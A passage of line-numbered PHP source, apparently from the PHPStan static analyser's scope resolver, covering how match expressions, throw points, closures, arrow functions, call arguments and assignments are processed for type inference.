$keyResult->getThrowPoints(); 2599: } 2600: if ($expr->value !== null) { 2601: $valueResult = $this->processExprNode($expr->value, $scope, $nodeCallback, $context->enterDeep()); 2602: $scope = $valueResult->getScope(); 2603: $throwPoints = array_merge($throwPoints, $valueResult->getThrowPoints()); 2604: } 2605: $hasYield = true; 2606: } elseif ($expr instanceof Expr\Match_) { 2607: $deepContext = $context->enterDeep(); 2608: $condResult = $this->processExprNode($expr->cond, $scope, $nodeCallback, $deepContext); 2609: $scope = $condResult->getScope(); 2610: $hasYield = $condResult->hasYield(); 2611: $throwPoints = $condResult->getThrowPoints(); 2612: $matchScope = $scope; 2613: $armNodes = []; 2614: $hasDefaultCond = false; 2615: $hasAlwaysTrueCond = false; 2616: foreach ($expr->arms as $arm) { 2617: if ($arm->conds === null) { 2618: $hasDefaultCond = true; 2619: $armResult = $this->processExprNode($arm->body, $matchScope, $nodeCallback, ExpressionContext::createTopLevel()); 2620: $matchScope = $armResult->getScope(); 2621: $hasYield = $hasYield || $armResult->hasYield(); 2622: $throwPoints = array_merge($throwPoints, $armResult->getThrowPoints()); 2623: $scope = $scope->mergeWith($matchScope); 2624: $armNodes[] = new MatchExpressionArm([], $arm->getLine()); 2625: continue; 2626: } 2627: 2628: if (count($arm->conds) === 0) { 2629: throw new ShouldNotHappenException(); 2630: } 2631: 2632: $filteringExpr = null; 2633: $armCondScope = $matchScope; 2634: $condNodes = []; 2635: foreach ($arm->conds as $armCond) { 2636: $condNodes[] = new MatchExpressionArmCondition($armCond, $armCondScope, $armCond->getLine()); 2637: $armCondResult = $this->processExprNode($armCond, $armCondScope, $nodeCallback, $deepContext); 2638: $hasYield = $hasYield || $armCondResult->hasYield(); 2639: $throwPoints = array_merge($throwPoints, $armCondResult->getThrowPoints()); 2640: $armCondExpr = new BinaryOp\Identical($expr->cond, $armCond); 2641: $armCondType = $armCondResult->getScope()->getType($armCondExpr); 2642: if ($armCondType instanceof ConstantBooleanType && $armCondType->getValue()) { 2643: $hasAlwaysTrueCond = true; 2644: } 2645: $armCondScope = $armCondResult->getScope()->filterByFalseyValue($armCondExpr); 2646: if ($filteringExpr === null) { 2647: $filteringExpr = $armCondExpr; 2648: continue; 2649: } 2650: 2651: $filteringExpr = new BinaryOp\BooleanOr($filteringExpr, $armCondExpr); 2652: } 2653: 2654: $armNodes[] = new MatchExpressionArm($condNodes, $arm->getLine()); 2655: 2656: $armResult = $this->processExprNode( 2657: $arm->body, 2658: $matchScope->filterByTruthyValue($filteringExpr), 2659: $nodeCallback, 2660: ExpressionContext::createTopLevel(), 2661: ); 2662: $armScope = $armResult->getScope(); 2663: $scope = $scope->mergeWith($armScope); 2664: $hasYield = $hasYield || $armResult->hasYield(); 2665: $throwPoints = array_merge($throwPoints, $armResult->getThrowPoints()); 2666: $matchScope = $matchScope->filterByFalseyValue($filteringExpr); 2667: } 2668: 2669: $remainingType = $matchScope->getType($expr->cond); 2670: if (!$hasDefaultCond && !$hasAlwaysTrueCond && !$remainingType instanceof NeverType) { 2671: $throwPoints[] = ThrowPoint::createExplicit($scope, new ObjectType(UnhandledMatchError::class), $expr, false); 2672: } 2673: 2674: $nodeCallback(new MatchExpressionNode($expr->cond, $armNodes, $expr, $matchScope), $scope); 2675: } elseif ($expr instanceof Expr\Throw_) { 2676: $hasYield = false; 2677: $result = $this->processExprNode($expr->expr, $scope, $nodeCallback, ExpressionContext::createDeep()); 2678: $throwPoints = $result->getThrowPoints(); 2679: $throwPoints[] = ThrowPoint::createExplicit($scope, $scope->getType($expr->expr), $expr, false); 2680: } elseif ($expr instanceof FunctionCallableNode) { 2681: $throwPoints = []; 2682: $hasYield = false; 2683: if ($expr->getName() instanceof Expr) { 2684: $result = $this->processExprNode($expr->getName(), $scope, $nodeCallback, ExpressionContext::createDeep()); 2685: $scope = $result->getScope(); 2686: $hasYield = $result->hasYield(); 2687: $throwPoints = $result->getThrowPoints(); 2688: } 2689: } elseif ($expr instanceof MethodCallableNode) { 2690: $result = $this->processExprNode($expr->getVar(), $scope, $nodeCallback, ExpressionContext::createDeep()); 2691: $scope = $result->getScope(); 2692: $hasYield = $result->hasYield(); 2693: $throwPoints = $result->getThrowPoints(); 2694: if ($expr->getName() instanceof Expr) { 2695: $nameResult = $this->processExprNode($expr->getVar(), $scope, $nodeCallback, ExpressionContext::createDeep()); 2696: $scope = $nameResult->getScope(); 2697: $hasYield = $hasYield || $nameResult->hasYield(); 2698: $throwPoints = array_merge($throwPoints, $nameResult->getThrowPoints()); 2699: } 2700: } elseif ($expr instanceof StaticMethodCallableNode) { 2701: $throwPoints = []; 2702: $hasYield = false; 2703: if ($expr->getClass() instanceof Expr) { 2704: $classResult = $this->processExprNode($expr->getClass(), $scope, $nodeCallback, ExpressionContext::createDeep()); 2705: $scope = $classResult->getScope(); 2706: $hasYield = $classResult->hasYield(); 2707: $throwPoints = $classResult->getThrowPoints(); 2708: } 2709: if ($expr->getName() instanceof Expr) { 2710: $nameResult = $this->processExprNode($expr->getName(), $scope, $nodeCallback, ExpressionContext::createDeep()); 2711: $scope = $nameResult->getScope(); 2712: $hasYield = $hasYield || $nameResult->hasYield(); 2713: $throwPoints = array_merge($throwPoints, $nameResult->getThrowPoints()); 2714: } 2715: } elseif ($expr instanceof InstantiationCallableNode) { 2716: $throwPoints = []; 2717: $hasYield = false; 2718: if ($expr->getClass() instanceof Expr) { 2719: $classResult = $this->processExprNode($expr->getClass(), $scope, $nodeCallback, ExpressionContext::createDeep()); 2720: $scope = $classResult->getScope(); 2721: $hasYield = $classResult->hasYield(); 2722: $throwPoints = $classResult->getThrowPoints(); 2723: } 2724: } else { 2725: $hasYield = false; 2726: $throwPoints = []; 2727: } 2728: 2729: return new ExpressionResult( 2730: $scope, 2731: $hasYield, 2732: $throwPoints, 2733: static fn (): MutatingScope => $scope->filterByTruthyValue($expr), 2734: static fn (): MutatingScope => $scope->filterByFalseyValue($expr), 2735: ); 2736: } 2737: 2738: private function getFunctionThrowPoint( 2739: FunctionReflection $functionReflection, 2740: ?ParametersAcceptor $parametersAcceptor, 2741: FuncCall $funcCall, 2742: MutatingScope $scope, 2743: ): ?ThrowPoint 2744: { 2745: $normalizedFuncCall = $funcCall; 2746: if ($parametersAcceptor !== null) { 2747: $normalizedFuncCall = ArgumentsNormalizer::reorderFuncArguments($parametersAcceptor, $funcCall); 2748: } 2749: 2750: if ($normalizedFuncCall !== null) { 2751: foreach ($this->dynamicThrowTypeExtensionProvider->getDynamicFunctionThrowTypeExtensions() as $extension) { 2752: if (!$extension->isFunctionSupported($functionReflection)) { 2753: continue; 2754: } 2755: 2756: $throwType = $extension->getThrowTypeFromFunctionCall($functionReflection, $normalizedFuncCall, $scope); 2757: if ($throwType === null) { 2758: return null; 2759: } 2760: 2761: return ThrowPoint::createExplicit($scope, $throwType, $funcCall, false); 2762: } 2763: } 2764: 2765: $throwType = $functionReflection->getThrowType(); 2766: if ($throwType === null && $parametersAcceptor !== null) { 2767: $returnType = $parametersAcceptor->getReturnType(); 2768: if ($returnType instanceof NeverType && $returnType->isExplicit()) { 2769: $throwType = new ObjectType(Throwable::class); 2770: } 2771: } 2772: 2773: if ($throwType !== null) { 2774: if (!$throwType instanceof VoidType) { 2775: return ThrowPoint::createExplicit($scope, $throwType, $funcCall, true); 2776: } 2777: } elseif ($this->implicitThrows) { 2778: $requiredParameters = null; 2779: if ($parametersAcceptor !== null) { 2780: $requiredParameters = 0; 2781: foreach ($parametersAcceptor->getParameters() as $parameter) { 2782: if ($parameter->isOptional()) { 2783: continue; 2784: } 2785: 2786: $requiredParameters++; 2787: } 2788: } 2789: if ( 2790: !$functionReflection->isBuiltin() 2791: || $requiredParameters === null 2792: || $requiredParameters > 0 2793: || count($funcCall->getArgs()) > 0 2794: ) { 2795: $functionReturnedType = $scope->getType($funcCall); 2796: if (!(new ObjectType(Throwable::class))->isSuperTypeOf($functionReturnedType)->yes()) { 2797: return ThrowPoint::createImplicit($scope, $funcCall); 2798: } 2799: } 2800: } 2801: 2802: return null; 2803: } 2804: 2805: private function getMethodThrowPoint(MethodReflection $methodReflection, ParametersAcceptor $parametersAcceptor, MethodCall $methodCall, MutatingScope $scope): ?ThrowPoint 2806: { 2807: $normalizedMethodCall = ArgumentsNormalizer::reorderMethodArguments($parametersAcceptor, $methodCall); 2808: if ($normalizedMethodCall !== null) { 2809: foreach ($this->dynamicThrowTypeExtensionProvider->getDynamicMethodThrowTypeExtensions() as $extension) { 2810: if (!$extension->isMethodSupported($methodReflection)) { 2811: continue; 2812: } 2813: 2814: $throwType = $extension->getThrowTypeFromMethodCall($methodReflection, $normalizedMethodCall, $scope); 2815: if ($throwType === null) { 2816: return null; 2817: } 2818: 2819: return ThrowPoint::createExplicit($scope, $throwType, $methodCall, false); 2820: } 2821: } 2822: 2823: $throwType = $methodReflection->getThrowType(); 2824: if ($throwType === null) { 2825: $returnType = $parametersAcceptor->getReturnType(); 2826: if ($returnType instanceof NeverType && $returnType->isExplicit()) { 2827: $throwType = new ObjectType(Throwable::class); 2828: } 2829: } 2830: 2831: if ($throwType !== null) { 2832: if (!$throwType instanceof VoidType) { 2833: return ThrowPoint::createExplicit($scope, $throwType, $methodCall, true); 2834: } 2835: } elseif ($this->implicitThrows) { 2836: $methodReturnedType = $scope->getType($methodCall); 2837: if (!(new ObjectType(Throwable::class))->isSuperTypeOf($methodReturnedType)->yes()) { 2838: return ThrowPoint::createImplicit($scope, $methodCall); 2839: } 2840: } 2841: 2842: return null; 2843: } 2844: 2845: /** 2846: * @param Node\Arg[] $args 2847: */ 2848: private function getConstructorThrowPoint(MethodReflection $constructorReflection, ParametersAcceptor $parametersAcceptor, ClassReflection $classReflection, New_ $new, Name $className, array $args, MutatingScope $scope): ?ThrowPoint 2849: { 2850: $methodCall = new StaticCall($className, $constructorReflection->getName(), $args); 2851: $normalizedMethodCall = ArgumentsNormalizer::reorderStaticCallArguments($parametersAcceptor, $methodCall); 2852: if ($normalizedMethodCall !== null) { 2853: foreach ($this->dynamicThrowTypeExtensionProvider->getDynamicStaticMethodThrowTypeExtensions() as $extension) { 2854: if (!$extension->isStaticMethodSupported($constructorReflection)) { 2855: continue; 2856: } 2857: 2858: $throwType = $extension->getThrowTypeFromStaticMethodCall($constructorReflection, $normalizedMethodCall, $scope); 2859: if ($throwType === null) { 2860: return null; 2861: } 2862: 2863: return ThrowPoint::createExplicit($scope, $throwType, $new, false); 2864: } 2865: } 2866: 2867: if ($constructorReflection->getThrowType() !== null) { 2868: $throwType = $constructorReflection->getThrowType(); 2869: if (!$throwType instanceof VoidType) { 2870: return ThrowPoint::createExplicit($scope, $throwType, $new, true); 2871: } 2872: } elseif ($this->implicitThrows) { 2873: if ($classReflection->getName() !== Throwable::class && !$classReflection->isSubclassOf(Throwable::class)) { 2874: return ThrowPoint::createImplicit($scope, $methodCall); 2875: } 2876: } 2877: 2878: return null; 2879: } 2880: 2881: private function getStaticMethodThrowPoint(MethodReflection $methodReflection, ParametersAcceptor $parametersAcceptor, StaticCall $methodCall, MutatingScope $scope): ?ThrowPoint 2882: { 2883: $normalizedMethodCall = ArgumentsNormalizer::reorderStaticCallArguments($parametersAcceptor, $methodCall); 2884: if ($normalizedMethodCall !== null) { 2885: foreach ($this->dynamicThrowTypeExtensionProvider->getDynamicStaticMethodThrowTypeExtensions() as $extension) { 2886: if (!$extension->isStaticMethodSupported($methodReflection)) { 2887: continue; 2888: } 2889: 2890: $throwType = $extension->getThrowTypeFromStaticMethodCall($methodReflection, $normalizedMethodCall, $scope); 2891: if ($throwType === null) { 2892: return null; 2893: } 2894: 2895: return ThrowPoint::createExplicit($scope, $throwType, $methodCall, false); 2896: } 2897: } 2898: 2899: if ($methodReflection->getThrowType() !== null) { 2900: $throwType = $methodReflection->getThrowType(); 2901: if (!$throwType instanceof VoidType) { 2902: return ThrowPoint::createExplicit($scope, $throwType, $methodCall, true); 2903: } 2904: } elseif ($this->implicitThrows) { 2905: $methodReturnedType = $scope->getType($methodCall); 2906: if (!(new ObjectType(Throwable::class))->isSuperTypeOf($methodReturnedType)->yes()) { 2907: return ThrowPoint::createImplicit($scope, $methodCall); 2908: } 2909: } 2910: 2911: return null; 2912: } 2913: 2914: /** 2915: * @return string[] 2916: */ 2917: private function getAssignedVariables(Expr $expr): array 2918: { 2919: if ($expr instanceof Expr\Variable) { 2920: if (is_string($expr->name)) { 2921: return [$expr->name]; 2922: } 2923: 2924: return []; 2925: } 2926: 2927: if ($expr instanceof Expr\List_ || $expr instanceof Expr\Array_) { 2928: $names = []; 2929: foreach ($expr->items as $item) { 2930: if ($item === null) { 2931: continue; 2932: } 2933: 2934: $names = array_merge($names, $this->getAssignedVariables($item->value)); 2935: } 2936: 2937: return $names; 2938: } 2939: 2940: if ($expr instanceof ArrayDimFetch) { 2941: return $this->getAssignedVariables($expr->var); 2942: } 2943: 2944: return []; 2945: } 2946: 2947: /** 2948: * @param callable(Node $node, Scope $scope): void $nodeCallback 2949: */ 2950: private function callNodeCallbackWithExpression( 2951: callable $nodeCallback, 2952: Expr $expr, 2953: MutatingScope $scope, 2954: ExpressionContext $context, 2955: ): void 2956: { 2957: if ($context->isDeep()) { 2958: $scope = $scope->exitFirstLevelStatements(); 2959: } 2960: $nodeCallback($expr, $scope); 2961: } 2962: 2963: /** 2964: * @param callable(Node $node, Scope $scope): void $nodeCallback 2965: */ 2966: private function processClosureNode( 2967: Expr\Closure $expr, 2968: MutatingScope $scope, 2969: callable $nodeCallback, 2970: ExpressionContext $context, 2971: ?Type $passedToType, 2972: ): ExpressionResult 2973: { 2974: foreach ($expr->params as $param) { 2975: $this->processParamNode($param, $scope, $nodeCallback); 2976: } 2977: 2978: $byRefUses = []; 2979: 2980: $callableParameters = null; 2981: $closureCallArgs = $expr->getAttribute(ClosureArgVisitor::ATTRIBUTE_NAME); 2982: 2983: if ($closureCallArgs !== null) { 2984: $acceptors = $scope->getType($expr)->getCallableParametersAcceptors($scope); 2985: if (count($acceptors) === 1) { 2986: $callableParameters = $acceptors[0]->getParameters(); 2987: 2988: foreach ($callableParameters as $index => $callableParameter) { 2989: if (!isset($closureCallArgs[$index])) { 2990: continue; 2991: } 2992: 2993: $type = $scope->getType($closureCallArgs[$index]->value); 2994: $callableParameters[$index] = new NativeParameterReflection( 2995: $callableParameter->getName(), 2996: $callableParameter->isOptional(), 2997: $type, 2998: $callableParameter->passedByReference(), 2999: $callableParameter->isVariadic(), 3000: $callableParameter->getDefaultValue(), 3001: ); 3002: } 3003: } 3004: } elseif ($passedToType !== null && !$passedToType->isCallable()->no()) { 3005: if ($passedToType instanceof UnionType) { 3006: $passedToType = TypeCombinator::union(...array_filter( 3007: $passedToType->getTypes(), 3008: static fn (Type $type) => $type->isCallable()->yes(), 3009: )); 3010: } 3011: 3012: $acceptors = $passedToType->getCallableParametersAcceptors($scope); 3013: if (count($acceptors) === 1) { 3014: $callableParameters = $acceptors[0]->getParameters(); 3015: } 3016: } 3017: 3018: $useScope = $scope; 3019: foreach ($expr->uses as $use) { 3020: if ($use->byRef) { 3021: $byRefUses[] = $use; 3022: $useScope = $useScope->enterExpressionAssign($use->var); 3023: 3024: $inAssignRightSideVariableName = $context->getInAssignRightSideVariableName(); 3025: $inAssignRightSideType = $context->getInAssignRightSideType(); 3026: if ( 3027: $inAssignRightSideVariableName === $use->var->name 3028: && $inAssignRightSideType !== null 3029: ) { 3030: if ($inAssignRightSideType instanceof ClosureType) { 3031: $variableType = $inAssignRightSideType; 3032: } else { 3033: $alreadyHasVariableType = $scope->hasVariableType($inAssignRightSideVariableName); 3034: if ($alreadyHasVariableType->no()) { 3035: $variableType = TypeCombinator::union(new NullType(), $inAssignRightSideType); 3036: } else { 3037: $variableType = TypeCombinator::union($scope->getVariableType($inAssignRightSideVariableName), $inAssignRightSideType); 3038: } 3039: } 3040: $scope = $scope->assignVariable($inAssignRightSideVariableName, $variableType); 3041: } 3042: } 3043: $this->processExprNode($use, $useScope, $nodeCallback, $context); 3044: if (!$use->byRef) { 3045: continue; 3046: } 3047: 3048: $useScope = $useScope->exitExpressionAssign($use->var); 3049: } 3050: 3051: if ($expr->returnType !== null) { 3052: $nodeCallback($expr->returnType, $scope); 3053: } 3054: 3055: $closureScope = $scope->enterAnonymousFunction($expr, $callableParameters); 3056: $closureScope = $closureScope->processClosureScope($scope, null, $byRefUses); 3057: $closureType = $closureScope->getAnonymousFunctionReflection(); 3058: if (!$closureType instanceof ClosureType) { 3059: throw new ShouldNotHappenException(); 3060: } 3061: 3062: $nodeCallback(new InClosureNode($closureType, $expr), $closureScope); 3063: 3064: $gatheredReturnStatements = []; 3065: $gatheredYieldStatements = []; 3066: $closureStmtsCallback = static function (Node $node, Scope $scope) use ($nodeCallback, &$gatheredReturnStatements, &$gatheredYieldStatements, &$closureScope): void { 3067: $nodeCallback($node, $scope); 3068: if ($scope->getAnonymousFunctionReflection() !== $closureScope->getAnonymousFunctionReflection()) { 3069: return; 3070: } 3071: if ($node instanceof Expr\Yield_ || $node instanceof Expr\YieldFrom) { 3072: $gatheredYieldStatements[] = $node; 3073: } 3074: if (!$node instanceof Return_) { 3075: return; 3076: } 3077: 3078: $gatheredReturnStatements[] = new ReturnStatement($scope, $node); 3079: }; 3080: if (count($byRefUses) === 0) { 3081: $statementResult = $this->processStmtNodes($expr, $expr->stmts, $closureScope, $closureStmtsCallback); 3082: $nodeCallback(new ClosureReturnStatementsNode( 3083: $expr, 3084: $gatheredReturnStatements, 3085: $gatheredYieldStatements, 3086: $statementResult, 3087: ), $closureScope); 3088: 3089: return new ExpressionResult($scope, false, []); 3090: } 3091: 3092: $count = 0; 3093: do { 3094: $prevScope = $closureScope; 3095: 3096: $intermediaryClosureScopeResult = $this->processStmtNodes($expr, $expr->stmts, $closureScope, static function (): void { 3097: }); 3098: $intermediaryClosureScope = $intermediaryClosureScopeResult->getScope(); 3099: foreach ($intermediaryClosureScopeResult->getExitPoints() as $exitPoint) { 3100: $intermediaryClosureScope = $intermediaryClosureScope->mergeWith($exitPoint->getScope()); 3101: } 3102: $closureScope = $scope->enterAnonymousFunction($expr, $callableParameters); 3103: $closureScope = $closureScope->processClosureScope($intermediaryClosureScope, $prevScope, $byRefUses); 3104: if ($closureScope->equals($prevScope)) { 3105: break; 3106: } 3107: if ($count >= self::GENERALIZE_AFTER_ITERATION) { 3108: $closureScope = $prevScope->generalizeWith($closureScope); 3109: } 3110: $count++; 3111: } while ($count < self::LOOP_SCOPE_ITERATIONS); 3112: 3113: $statementResult = $this->processStmtNodes($expr, $expr->stmts, $closureScope, $closureStmtsCallback); 3114: $nodeCallback(new ClosureReturnStatementsNode( 3115: $expr, 3116: $gatheredReturnStatements, 3117: $gatheredYieldStatements, 3118: $statementResult, 3119: ), $closureScope); 3120: 3121: return new ExpressionResult($scope->processClosureScope($closureScope, null, $byRefUses), false, []); 3122: } 3123: 3124: /** 3125: * @param callable(Node $node, Scope $scope): void $nodeCallback 3126: */ 3127: private function processArrowFunctionNode( 3128: Expr\ArrowFunction $expr, 3129: MutatingScope $scope, 3130: callable $nodeCallback, 3131: ExpressionContext $context, 3132: ?Type $passedToType, 3133: ): ExpressionResult 3134: { 3135: foreach ($expr->params as $param) { 3136: $this->processParamNode($param, $scope, $nodeCallback); 3137: } 3138: if ($expr->returnType !== null) { 3139: $nodeCallback($expr->returnType, $scope); 3140: } 3141: 3142: $callableParameters = null; 3143: $arrowFunctionCallArgs = $expr->getAttribute(ArrowFunctionArgVisitor::ATTRIBUTE_NAME); 3144: 3145: if ($arrowFunctionCallArgs !== null) { 3146: $acceptors = $scope->getType($expr)->getCallableParametersAcceptors($scope); 3147: if (count($acceptors) === 1) { 3148: $callableParameters = $acceptors[0]->getParameters(); 3149: 3150: foreach ($callableParameters as $index => $callableParameter) { 3151: if (!isset($arrowFunctionCallArgs[$index])) { 3152: continue; 3153: } 3154: 3155: $type = $scope->getType($arrowFunctionCallArgs[$index]->value); 3156: $callableParameters[$index] = new NativeParameterReflection( 3157: $callableParameter->getName(), 3158: $callableParameter->isOptional(), 3159: $type, 3160: $callableParameter->passedByReference(), 3161: $callableParameter->isVariadic(), 3162: $callableParameter->getDefaultValue(), 3163: ); 3164: } 3165: } 3166: } elseif ($passedToType !== null && !$passedToType->isCallable()->no()) { 3167: if ($passedToType instanceof UnionType) { 3168: $passedToType = TypeCombinator::union(...array_filter( 3169: $passedToType->getTypes(), 3170: static fn (Type $type) => $type->isCallable()->yes(), 3171: )); 3172: } 3173: 3174: $acceptors = $passedToType->getCallableParametersAcceptors($scope); 3175: if (count($acceptors) === 1) { 3176: $callableParameters = $acceptors[0]->getParameters(); 3177: } 3178: } 3179: 3180: $arrowFunctionScope = $scope->enterArrowFunction($expr, $callableParameters); 3181: $nodeCallback(new InArrowFunctionNode($expr), $arrowFunctionScope); 3182: $this->processExprNode($expr->expr, $arrowFunctionScope, $nodeCallback, ExpressionContext::createTopLevel()); 3183: 3184: return new ExpressionResult($scope, false, []); 3185: } 3186: 3187: /** 3188: * @param callable(Node $node, Scope $scope): void $nodeCallback 3189: */ 3190: private function processParamNode( 3191: Node\Param $param, 3192: MutatingScope $scope, 3193: callable $nodeCallback, 3194: ): void 3195: { 3196: $this->processAttributeGroups($param->attrGroups, $scope, $nodeCallback); 3197: $nodeCallback($param, $scope); 3198: if ($param->type !== null) { 3199: $nodeCallback($param->type, $scope); 3200: } 3201: if ($param->default === null) { 3202: return; 3203: } 3204: 3205: $this->processExprNode($param->default, $scope, $nodeCallback, ExpressionContext::createDeep()); 3206: } 3207: 3208: /** 3209: * @param AttributeGroup[] $attrGroups 3210: * @param callable(Node $node, Scope $scope): void $nodeCallback 3211: */ 3212: private function processAttributeGroups( 3213: array $attrGroups, 3214: MutatingScope $scope, 3215: callable $nodeCallback, 3216: ): void 3217: { 3218: foreach ($attrGroups as $attrGroup) { 3219: foreach ($attrGroup->attrs as $attr) { 3220: foreach ($attr->args as $arg) { 3221: $this->processExprNode($arg->value, $scope, $nodeCallback, ExpressionContext::createDeep()); 3222: $nodeCallback($arg, $scope); 3223: } 3224: $nodeCallback($attr, $scope); 3225: } 3226: $nodeCallback($attrGroup, $scope); 3227: } 3228: } 3229: 3230: /** 3231: * @param MethodReflection|FunctionReflection|null $calleeReflection 3232: * @param Node\Arg[] $args 3233: * @param callable(Node $node, Scope $scope): void $nodeCallback 3234: */ 3235: private function processArgs( 3236: $calleeReflection, 3237: ?ParametersAcceptor $parametersAcceptor, 3238: array $args, 3239: MutatingScope $scope, 3240: callable $nodeCallback, 3241: ExpressionContext $context, 3242: ?MutatingScope $closureBindScope = null, 3243: ): ExpressionResult 3244: { 3245: if ($parametersAcceptor !== null) { 3246: $parameters = $parametersAcceptor->getParameters(); 3247: } 3248: 3249: if ($calleeReflection !== null) { 3250: $scope = $scope->pushInFunctionCall($calleeReflection); 3251: } 3252: 3253: $hasYield = false; 3254: $throwPoints = []; 3255: foreach ($args as $i => $arg) { 3256: $nodeCallback($arg, $scope); 3257: if (isset($parameters) && $parametersAcceptor !== null) { 3258: $assignByReference = false; 3259: if (isset($parameters[$i])) { 3260: $assignByReference = $parameters[$i]->passedByReference()->createsNewVariable(); 3261: $parameterType = $parameters[$i]->getType(); 3262: } elseif (count($parameters) > 0 && $parametersAcceptor->isVariadic()) { 3263: $lastParameter = $parameters[count($parameters) - 1]; 3264: $assignByReference = $lastParameter->passedByReference()->createsNewVariable(); 3265: $parameterType = $lastParameter->getType(); 3266: } 3267: 3268: if ($assignByReference) { 3269: $argValue = $arg->value; 3270: if ($argValue instanceof Variable && is_string($argValue->name)) { 3271: $scope = $scope->assignVariable($argValue->name, new MixedType()); 3272: } 3273: } 3274: } 3275: 3276: $originalScope = $scope; 3277: $scopeToPass = $scope; 3278: if ($i === 0 && $closureBindScope !== null) { 3279: $scopeToPass = $closureBindScope; 3280: } 3281: 3282: if ($arg->value instanceof Expr\Closure) { 3283: $this->callNodeCallbackWithExpression($nodeCallback, $arg->value, $scopeToPass, $context); 3284: $result = $this->processClosureNode($arg->value, $scopeToPass, $nodeCallback, $context, $parameterType ?? null); 3285: } elseif ($arg->value instanceof Expr\ArrowFunction) { 3286: $this->callNodeCallbackWithExpression($nodeCallback, $arg->value, $scopeToPass, $context); 3287: $result = $this->processArrowFunctionNode($arg->value, $scopeToPass, $nodeCallback, $context, $parameterType ?? null); 3288: } else { 3289: $result = $this->processExprNode($arg->value, $scopeToPass, $nodeCallback, $context->enterDeep()); 3290: } 3291: $scope = $result->getScope(); 3292: $hasYield = $hasYield || $result->hasYield(); 3293: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 3294: if ($i !== 0 || $closureBindScope === null) { 3295: continue; 3296: } 3297: 3298: $scope = $scope->restoreOriginalScopeAfterClosureBind($originalScope); 3299: } 3300: 3301: if ($calleeReflection !== null) { 3302: $scope = $scope->popInFunctionCall(); 3303: } 3304: 3305: return new ExpressionResult($scope, $hasYield, $throwPoints); 3306: } 3307: 3308: /** 3309: * @param callable(Node $node, Scope $scope): void $nodeCallback 3310: * @param Closure(MutatingScope $scope): ExpressionResult $processExprCallback 3311: */ 3312: private function processAssignVar( 3313: MutatingScope $scope, 3314: Expr $var, 3315: Expr $assignedExpr, 3316: callable $nodeCallback, 3317: ExpressionContext $context, 3318: Closure $processExprCallback, 3319: bool $enterExpressionAssign, 3320: ): ExpressionResult 3321: { 3322: $nodeCallback($var, $enterExpressionAssign ? $scope->enterExpressionAssign($var) : $scope); 3323: $hasYield = false; 3324: $throwPoints = []; 3325: $isAssignOp = $assignedExpr instanceof Expr\AssignOp && !$enterExpressionAssign; 3326: if ($var instanceof Variable && is_string($var->name)) { 3327: $result = $processExprCallback($scope); 3328: $hasYield = $result->hasYield(); 3329: $throwPoints = $result->getThrowPoints(); 3330: $assignedExpr = $this->unwrapAssign($assignedExpr); 3331: $type = $scope->getType($assignedExpr); 3332: $truthySpecifiedTypes = $this->typeSpecifier->specifyTypesInCondition($scope, $assignedExpr, TypeSpecifierContext::createTruthy()); 3333: $falseySpecifiedTypes = $this->typeSpecifier->specifyTypesInCondition($scope, $assignedExpr, TypeSpecifierContext::createFalsey()); 3334: 3335: $conditionalExpressions = []; 3336: 3337: $truthyType = TypeCombinator::remove($type, StaticTypeFactory::falsey()); 3338: $falseyType = TypeCombinator::intersect($type, StaticTypeFactory::falsey()); 3339: 3340: $conditionalExpressions = $this->processSureTypesForConditionalExpressionsAfterAssign($scope, $var->name, $conditionalExpressions, $truthySpecifiedTypes, $truthyType); 3341: $conditionalExpressions = $this->processSureNotTypesForConditionalExpressionsAfterAssign($scope, $var->name, $conditionalExpressions, $truthySpecifiedTypes, $truthyType); 3342: $conditionalExpressions = $this->processSureTypesForConditionalExpressionsAfterAssign($scope, $var->name, $conditionalExpressions, $falseySpecifiedTypes, $falseyType); 3343: $conditionalExpressions = $this->processSureNotTypesForConditionalExpressionsAfterAssign($scope, $var->name, $conditionalExpressions, $falseySpecifiedTypes, $falseyType); 3344: 3345: $scope = $result->getScope()->assignVariable($var->name, $type); 3346: foreach ($conditionalExpressions as $exprString => $holders) { 3347: $scope = $scope->addConditionalExpressions($exprString, $holders); 3348: } 3349: } elseif ($var instanceof ArrayDimFetch) { 3350: $dimExprStack = []; 3351: $originalVar = $var; 3352: $assignedPropertyExpr = $assignedExpr; 3353: while ($var instanceof ArrayDimFetch) { 3354: $varForSetOffsetValue = $var->var; 3355: if ($varForSetOffsetValue instanceof PropertyFetch || $varForSetOffsetValue instanceof StaticPropertyFetch) { 3356: $varForSetOffsetValue = new OriginalPropertyTypeExpr($varForSetOffsetValue); 3357: } 3358: $assignedPropertyExpr = new SetOffsetValueTypeExpr( 3359: $varForSetOffsetValue, 3360: $var->dim, 3361: $assignedPropertyExpr, 3362: ); 3363: $dimExprStack[] = $var->dim; 3364: $var = $var->var; 3365: } 3366: 3367: // 1. eval root expr 3368: if ($enterExpressionAssign) { 3369: $scope = $scope->enterExpressionAssign($var); 3370: } 3371: $result = $this->processExprNode($var, $scope, $nodeCallback, $context->enterDeep()); 3372: $hasYield = $result->hasYield(); 3373: $throwPoints = $result->getThrowPoints(); 3374: $scope = $result->getScope(); 3375: if ($enterExpressionAssign) { 3376: $scope = $scope->exitExpressionAssign($var); 3377: } 3378: 3379: // 2. eval dimensions 3380: $offsetTypes = []; 3381: foreach (array_reverse($dimExprStack) as $dimExpr) { 3382: if ($dimExpr === null) { 3383: $offsetTypes[] = null; 3384: 3385: } else { 3386: $offsetTypes[] = $scope->getType($dimExpr); 3387: 3388: if ($enterExpressionAssign) { 3389: $scope->enterExpressionAssign($dimExpr); 3390: } 3391: $result = $this->processExprNode($dimExpr, $scope, $nodeCallback, $context->enterDeep()); 3392: $hasYield = $hasYield || $result->hasYield(); 3393: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 3394: $scope = $result->getScope(); 3395: 3396: if ($enterExpressionAssign) { 3397: $scope = $scope->exitExpressionAssign($dimExpr); 3398: } 3399: } 3400: } 3401: 3402: $valueToWrite = $scope->getType($assignedExpr); 3403: $originalValueToWrite = $valueToWrite; 3404: 3405: // 3. eval assigned expr 3406: $result = $processExprCallback($scope); 3407: $hasYield = $hasYield || $result->hasYield(); 3408: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 3409: $scope = $result->getScope(); 3410: 3411: $varType = $scope->getType($var); 3412: 3413: // 4. compose types 3414: if ($varType instanceof ErrorType) { 3415: $varType = new ConstantArrayType([], []); 3416: } 3417: $offsetValueType = $varType; 3418: $offsetValueTypeStack = [$offsetValueType]; 3419: foreach (array_slice($offsetTypes, 0, -1) as $offsetType) { 3420: if ($offsetType === null) { 3421: $offsetValueType = new ConstantArrayType([], []); 3422: 3423: } else { 